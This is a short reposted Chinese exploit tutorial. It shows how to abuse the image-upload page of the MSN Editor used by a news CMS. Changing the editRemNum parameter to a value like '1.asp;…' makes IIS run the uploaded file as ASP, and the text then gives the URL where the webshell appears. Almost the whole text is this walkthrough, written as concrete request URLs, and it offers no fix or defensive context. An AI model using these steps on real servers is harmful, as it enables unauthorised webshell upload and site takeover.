MSN Editor漏洞

2011-12-28 11:21:29 来源:网络转载 浏览:173
MSN Editor漏洞

MSN Editor编辑器漏洞利用
雷池新闻系统就是用的这个编辑器

MSN Editor编辑器图示


点图片上传后会出现上传页面的地址为
http://www.test.com/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=  
图片上传后,记下上传的路径,方便找webshell地址
点击图片的上传,这时候地址就变成了
http://www.test.com/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012  
图片的地址是根据RemNum后面的编号生成的。
利用很简单 配合IIS的解析漏洞,
把RemNum后面的数据修改为1.asp;41513102009204012
变成下面这个地址
http://www.test.com/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012  
然后在浏览器里打开
http://www.test.com/uppic/1.asp;41513102009204012_2.gif 
熟悉的界面跳出来了

(0)
(0)